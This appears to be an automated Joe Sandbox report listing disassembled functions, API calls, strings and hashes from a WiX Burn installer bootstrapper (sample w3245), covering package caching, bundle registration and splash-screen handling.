                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareHeapString$AllocateProcess
                                                                                                                                                                    • String ID: Code$ExitCode$Failed to allocate memory for exit code structs.$Failed to get @Code.$Failed to get @Type.$Failed to get exit code node count.$Failed to get next node.$Failed to parse @Code value: %ls$Failed to select exit code nodes.$Invalid exit code type: %ls$Type$error$exeengine.cpp$forceReboot$scheduleReboot$success
                                                                                                                                                                    • API String ID: 2664528157-1714101571
                                                                                                                                                                    • Opcode ID: 85cc6fe7b4926958c34bc88d68550f8e4651c98f344f2ea8329365e3b21c9606
                                                                                                                                                                    • Instruction ID: 7415126164ca1666510a0b9b0249076147786ec215a5627fae3afe10ddb369f1
                                                                                                                                                                    • Opcode Fuzzy Hash: 85cc6fe7b4926958c34bc88d68550f8e4651c98f344f2ea8329365e3b21c9606
                                                                                                                                                                    • Instruction Fuzzy Hash: 3661E73194522AFBCB10DB95DC41EAEBBB8EF90720F204655F821AB2D5DB709E10D790
                                                                                                                                                                    Function 009477F7 Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 206COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,rel,000000FF,?,?,?,00000000), ref: 00947857
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,href,000000FF), ref: 0094787C
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,length,000000FF), ref: 0094789C
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 009478CF
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,type,000000FF), ref: 009478EB
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00947916
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0094798D
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 009479D9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Compare$Free
                                                                                                                                                                    • String ID: `<u$comres.dll$feclient.dll$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
                                                                                                                                                                    • API String ID: 318886736-782967201
                                                                                                                                                                    • Opcode ID: 19d866ab522cb565f106f981ceba0d3df19da0bd75e57570b0d21af732f0773b
                                                                                                                                                                    • Instruction ID: b1fceda993f48846f97e2fc6cb84c18da763a2ce24fd67171328744925bc9487
                                                                                                                                                                    • Opcode Fuzzy Hash: 19d866ab522cb565f106f981ceba0d3df19da0bd75e57570b0d21af732f0773b
                                                                                                                                                                    • Instruction Fuzzy Hash: 79614E7690921DBFDB15DBE4CC45FAEF7B8AF05320F2046A5E521A7290D730AE10DB90
                                                                                                                                                                    Function 00916BCA Relevance: 31.9, APIs: 6, Strings: 12, Instructions: 351synchronizationthreadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090D4A8: EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,00917040,000000B8,00000000,?,00000000,75C0B390), ref: 0090D4B7
                                                                                                                                                                      • Part of subcall function 0090D4A8: InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 0090D4C6
                                                                                                                                                                      • Part of subcall function 0090D4A8: LeaveCriticalSection.KERNEL32(000000D0,?,00917040,000000B8,00000000,?,00000000,75C0B390), ref: 0090D4DB
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,009157BD,?,00000000,00000000), ref: 00916E34
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00904522,?,0094B500,?,00904846,?,?), ref: 00916E43
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00904522,?,0094B500,?,00904846,?,?), ref: 00916EA0
                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000000), ref: 00916F92
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00916F9B
                                                                                                                                                                    • CloseHandle.KERNEL32(crypt32.dll,?,00000000,?,00000000,00000001,00000000), ref: 00916FB5
                                                                                                                                                                      • Part of subcall function 0092BD05: SetThreadExecutionState.KERNEL32(80000001), ref: 0092BD0A
                                                                                                                                                                    Strings
                                                                                                                                                                    • crypt32.dll, xrefs: 00916ECD, 00916EE7, 00916FB4
                                                                                                                                                                    • core.cpp, xrefs: 00916C8A, 00916E67
                                                                                                                                                                    • Another per-machine setup is already executing., xrefs: 00916DC8
                                                                                                                                                                    • Another per-user setup is already executing., xrefs: 00916CD8
                                                                                                                                                                    • Failed to elevate., xrefs: 00916D94
                                                                                                                                                                    • Failed to cache engine to working directory., xrefs: 00916D71
                                                                                                                                                                    • Failed to set initial apply variables., xrefs: 00916D02
                                                                                                                                                                    • UX aborted apply begin., xrefs: 00916C94
                                                                                                                                                                    • Failed to create cache thread., xrefs: 00916E71
                                                                                                                                                                    • Failed to register bundle., xrefs: 00916DEE
                                                                                                                                                                    • Failed while caching, aborting execution., xrefs: 00916E98
                                                                                                                                                                    • Engine cannot start apply because it is busy with another action., xrefs: 00916C28
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle$CriticalSectionThread$CompareCreateEnterErrorExchangeExecutionInterlockedLastLeaveMutexReleaseState
                                                                                                                                                                    • String ID: Another per-machine setup is already executing.$Another per-user setup is already executing.$Engine cannot start apply because it is busy with another action.$Failed to cache engine to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to set initial apply variables.$Failed while caching, aborting execution.$UX aborted apply begin.$core.cpp$crypt32.dll
                                                                                                                                                                    • API String ID: 2169948125-4292671789
                                                                                                                                                                    • Opcode ID: 948cf2dd55647c4a0c08f8a63638f1eb815e09c7409c9df8439c8f1a1fe35e74
                                                                                                                                                                    • Instruction ID: 8b9c01aeb8b9053449262963a218deb785cf928384a9edb10f5ede09498c6c9d
                                                                                                                                                                    • Opcode Fuzzy Hash: 948cf2dd55647c4a0c08f8a63638f1eb815e09c7409c9df8439c8f1a1fe35e74
                                                                                                                                                                    • Instruction Fuzzy Hash: 96C1D072E0121DEBDF119F64DC85BEE3BA8AF44315F044179FD09AE282DB709981CBA1
                                                                                                                                                                    Function 00948134 Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 309COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,00000410), ref: 00948161
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 0094817C
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,upgrade,000000FF), ref: 0094821F
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,00700079,000000FF,version,000000FF,000002D8,0094B518,00000000), ref: 0094825E
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exclusive,000000FF), ref: 009482B1
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,0094B518,000000FF,true,000000FF), ref: 009482CF
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 00948307
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,enclosure,000000FF), ref: 0094844B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString
                                                                                                                                                                    • String ID: application$apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$true$type$upgrade$version
                                                                                                                                                                    • API String ID: 1825529933-3037633208
                                                                                                                                                                    • Opcode ID: 216468c6a53b98d43d107d0804cc11ae26c6f081c5e5c2023a93140df26013ab
                                                                                                                                                                    • Instruction ID: 01d1a115477e838674cfe9116805cf827c81dd504c0c64422f9d60f9f108e8bb
                                                                                                                                                                    • Opcode Fuzzy Hash: 216468c6a53b98d43d107d0804cc11ae26c6f081c5e5c2023a93140df26013ab
                                                                                                                                                                    • Instruction Fuzzy Hash: 09B18E31608606AFDB619F98CC85F5F77AAAB44734F214659F935EB2E1DB70E841CB00
                                                                                                                                                                    Function 0091E3C8 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 146registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0091E2AF: LoadBitmapW.USER32(?,00000001), ref: 0091E2E5
                                                                                                                                                                      • Part of subcall function 0091E2AF: GetLastError.KERNEL32 ref: 0091E2F1
                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0091E429
                                                                                                                                                                    • RegisterClassW.USER32(?), ref: 0091E43D
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091E448
                                                                                                                                                                    • UnregisterClassW.USER32(WixBurnSplashScreen,?), ref: 0091E54D
                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0091E55C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ClassErrorLastLoad$BitmapCursorDeleteObjectRegisterUnregister
                                                                                                                                                                    • String ID: Failed to create window.$Failed to load splash screen.$Failed to register window.$Unexpected return value from message pump.$WixBurnSplashScreen$splashscreen.cpp
                                                                                                                                                                    • API String ID: 164797020-2188509422
                                                                                                                                                                    • Opcode ID: 13d4b8cb24d18b472c3e7df5e6b29974fb6679edfa336a7ff2d74f77aa1f3138
                                                                                                                                                                    • Instruction ID: df012249b76647879806f71da0bd021b2776901cd605ce29e62c464b57d97036
                                                                                                                                                                    • Opcode Fuzzy Hash: 13d4b8cb24d18b472c3e7df5e6b29974fb6679edfa336a7ff2d74f77aa1f3138
                                                                                                                                                                    • Instruction Fuzzy Hash: C241BE76A04219BFEB119BE5DC08EEEBBB9FF08715F100125FE01A61A0E7709D449BA1
                                                                                                                                                                    Function 00929DE1 Relevance: 30.0, APIs: 4, Strings: 13, Instructions: 233threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,00000001,00000000,00000000,?,0092BC85,00000001), ref: 00929E46
                                                                                                                                                                    • GetLastError.KERNEL32(?,0092BC85,00000001), ref: 00929FB6
                                                                                                                                                                    • GetExitCodeThread.KERNEL32(00000001,00000000,?,0092BC85,00000001), ref: 00929FF6
                                                                                                                                                                    • GetLastError.KERNEL32(?,0092BC85,00000001), ref: 0092A000
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to execute MSP package., xrefs: 00929ECB
                                                                                                                                                                    • Failed to execute compatible package action., xrefs: 00929F73
                                                                                                                                                                    • apply.cpp, xrefs: 00929FDD, 0092A027
                                                                                                                                                                    • Failed to execute MSU package., xrefs: 00929EFB
                                                                                                                                                                    • Failed to execute package provider registration action., xrefs: 00929F17
                                                                                                                                                                    • Cache thread exited unexpectedly., xrefs: 0092A047
                                                                                                                                                                    • Failed to wait for cache check-point., xrefs: 00929FE7
                                                                                                                                                                    • Invalid execute action., xrefs: 0092A056
                                                                                                                                                                    • Failed to execute dependency action., xrefs: 00929F36
                                                                                                                                                                    • Failed to get cache thread exit code., xrefs: 0092A031
                                                                                                                                                                    • Failed to execute EXE package., xrefs: 00929E7D
                                                                                                                                                                    • Failed to execute MSI package., xrefs: 00929EA6
                                                                                                                                                                    • Failed to load compatible package on per-machine package., xrefs: 00929F5C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
                                                                                                                                                                    • String ID: Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute compatible package action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to load compatible package on per-machine package.$Failed to wait for cache check-point.$Invalid execute action.$apply.cpp
                                                                                                                                                                    • API String ID: 3703294532-2662572847
                                                                                                                                                                    • Opcode ID: f46f8b740a37130e6c0ab828a676bae27f0bf03991821de69bbda535ca16e043
                                                                                                                                                                    • Instruction ID: 596162684ff1692ff1f13fdb628ceb84346ff246563b688385dbb8f658a6c5c5
                                                                                                                                                                    • Opcode Fuzzy Hash: f46f8b740a37130e6c0ab828a676bae27f0bf03991821de69bbda535ca16e043
                                                                                                                                                                    • Instruction Fuzzy Hash: 46719D71A41229EFDB10DFA5E901EBE7BB8FB85B10F11416AFD01EB244D3749E009BA1
                                                                                                                                                                    Function 0090F210 Relevance: 29.9, APIs: 3, Strings: 14, Instructions: 183registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00943AF1: GetVersionExW.KERNEL32(?,?,00000000,?), ref: 00943B3E
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,00950D10,00020006,00000000,?,00000000,00000000,00000000,?,00000000,00000001,00000000,00000000), ref: 0090F440
                                                                                                                                                                      • Part of subcall function 009414A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,0090F28D,00950D10,Resume,00000005,?,00000000,00000000,00000000), ref: 009414BB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseValueVersion
                                                                                                                                                                    • String ID: "%ls" /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$burn.runonce$registration.cpp
                                                                                                                                                                    • API String ID: 2348918689-2631711097
                                                                                                                                                                    • Opcode ID: e71c7ddda409882c65c6bb61fc01fcce9ec93b676825ae8267933943fdcfd9e7
                                                                                                                                                                    • Instruction ID: 4df6754fb90aa678343a2b77507b000ca0cdf714a29ecdbb951c629277665f11
                                                                                                                                                                    • Opcode Fuzzy Hash: e71c7ddda409882c65c6bb61fc01fcce9ec93b676825ae8267933943fdcfd9e7
                                                                                                                                                                    • Instruction Fuzzy Hash: CD51FF32D4022ABFCF319AA5CC2AFAEB668AB80765F114535FD00B65E0D7759E0497C0
                                                                                                                                                                    Function 0092CC91 Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 174processCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(74DE8FB0,00000002,00000000), ref: 0092CC9D
                                                                                                                                                                      • Part of subcall function 00914D8D: UuidCreate.RPCRT4(?), ref: 00914DC0
                                                                                                                                                                    • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,08000000,00000000,00000000,?,00922401,?,?,00000000,?,?,?), ref: 0092CD7B
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,?,?,?,?), ref: 0092CD85
                                                                                                                                                                    • GetProcessId.KERNEL32(00922401,?,?,00000000,?,?,?,?), ref: 0092CDBD
                                                                                                                                                                      • Part of subcall function 009154DC: lstrlenW.KERNEL32(?,?,00000000,?,0094B500,?,00000000,?,0090452F,?,0094B500), ref: 009154FD
                                                                                                                                                                      • Part of subcall function 009154DC: GetCurrentProcessId.KERNEL32(?,0090452F,?,0094B500), ref: 00915508
                                                                                                                                                                      • Part of subcall function 009154DC: SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,0090452F,?,0094B500), ref: 0091553F
                                                                                                                                                                      • Part of subcall function 009154DC: ConnectNamedPipe.KERNEL32(?,00000000,?,0090452F,?,0094B500), ref: 00915554
                                                                                                                                                                      • Part of subcall function 009154DC: GetLastError.KERNEL32(?,0090452F,?,0094B500), ref: 0091555E
                                                                                                                                                                      • Part of subcall function 009154DC: Sleep.KERNEL32(00000064,?,0090452F,?,0094B500), ref: 00915593
                                                                                                                                                                      • Part of subcall function 009154DC: SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,0090452F,?,0094B500), ref: 009155B6
                                                                                                                                                                      • Part of subcall function 009154DC: WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,0090452F,?,0094B500), ref: 009155D1
                                                                                                                                                                      • Part of subcall function 009154DC: WriteFile.KERNEL32(?,0090452F,0094B500,00000000,00000000,?,0090452F,?,0094B500), ref: 009155EC
                                                                                                                                                                      • Part of subcall function 009154DC: WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,0090452F,?,0094B500), ref: 00915607
                                                                                                                                                                      • Part of subcall function 00940A28: WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,00904F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 00940A38
                                                                                                                                                                      • Part of subcall function 00940A28: GetLastError.KERNEL32(?,?,00904F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00940A46
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,0092CBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 0092CE41
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,0092CBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 0092CE50
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,000000FF,00000000,?,0092CBEF,?,?,?,?,?,00000000,?,?,?), ref: 0092CE67
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to allocate embedded command., xrefs: 0092CD54
                                                                                                                                                                    • Failed to create embedded process at path: %ls, xrefs: 0092CDB3
                                                                                                                                                                    • Failed to create embedded pipe., xrefs: 0092CD27
                                                                                                                                                                    • %ls -%ls %ls %ls %u, xrefs: 0092CD40
                                                                                                                                                                    • Failed to process messages from embedded message., xrefs: 0092CE04
                                                                                                                                                                    • burn.embedded, xrefs: 0092CD38
                                                                                                                                                                    • Failed to wait for embedded process to connect to pipe., xrefs: 0092CDDF
                                                                                                                                                                    • embedded.cpp, xrefs: 0092CDA6
                                                                                                                                                                    • Failed to create embedded pipe name and client token., xrefs: 0092CD00
                                                                                                                                                                    • Failed to wait for embedded executable: %ls, xrefs: 0092CE24
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Handle$Process$CloseErrorFileLastNamedPipeWrite$CreateCurrentState$ConnectObjectSingleSleepUuidWaitlstrlen
                                                                                                                                                                    • String ID: %ls -%ls %ls %ls %u$Failed to allocate embedded command.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$embedded.cpp
                                                                                                                                                                    • API String ID: 875070380-3803182736
                                                                                                                                                                    • Opcode ID: 722e21c9574d1af37c56e5403f34c8d135bfcd2c04a1eeee267c3fb3082a364f
                                                                                                                                                                    • Instruction ID: e7f70fe418cd59f91007bbc15fd4bb9ac10497ace8847d2183d401813bc0379a
                                                                                                                                                                    • Opcode Fuzzy Hash: 722e21c9574d1af37c56e5403f34c8d135bfcd2c04a1eeee267c3fb3082a364f
                                                                                                                                                                    • Instruction Fuzzy Hash: 14517FB2D4022DBBDF119BA4EC46FEEBBB8AF48711F110121FA04B6194D7749A409BD1
                                                                                                                                                                    Function 0090ECBE Relevance: 29.9, APIs: 2, Strings: 15, Instructions: 173COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0090EE4C
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0090EE04
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeHeapString$AllocateProcess
                                                                                                                                                                    • String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$`<u$registration.cpp
                                                                                                                                                                    • API String ID: 336948655-956346883
                                                                                                                                                                    • Opcode ID: 6ab9a0163f5cacbc915236aff9533e3dd0a95367f3958263fa4579b36a8cf742
                                                                                                                                                                    • Instruction ID: 956f323f4effc95c9e8a809b9bed43d598b96e393cc93a5fe7488dad50e14406
                                                                                                                                                                    • Opcode Fuzzy Hash: 6ab9a0163f5cacbc915236aff9533e3dd0a95367f3958263fa4579b36a8cf742
                                                                                                                                                                    • Instruction Fuzzy Hash: 4D519231E0162AFFDB11DF65C885FAEB7A8BF40714B1049A9FD05AB290C771DE009790
                                                                                                                                                                    Function 00947F7E Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 153stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,msi.dll,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,?,00948468,00000001,?), ref: 00947F9E
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,digest,000000FF,002E0069,000000FF,?,00948468,00000001,?), ref: 00947FB9
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,name,000000FF,002E0069,000000FF,?,00948468,00000001,?), ref: 00947FD4
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,algorithm,000000FF,?,000000FF,?,00948468,00000001,?), ref: 00948040
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000001,md5,000000FF,?,000000FF,?,00948468,00000001,?), ref: 00948064
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000001,sha1,000000FF,?,000000FF,?,00948468,00000001,?), ref: 00948088
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000001,sha256,000000FF,?,000000FF,?,00948468,00000001,?), ref: 009480A8
                                                                                                                                                                    • lstrlenW.KERNEL32(006C0064,?,00948468,00000001,?), ref: 009480C3
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
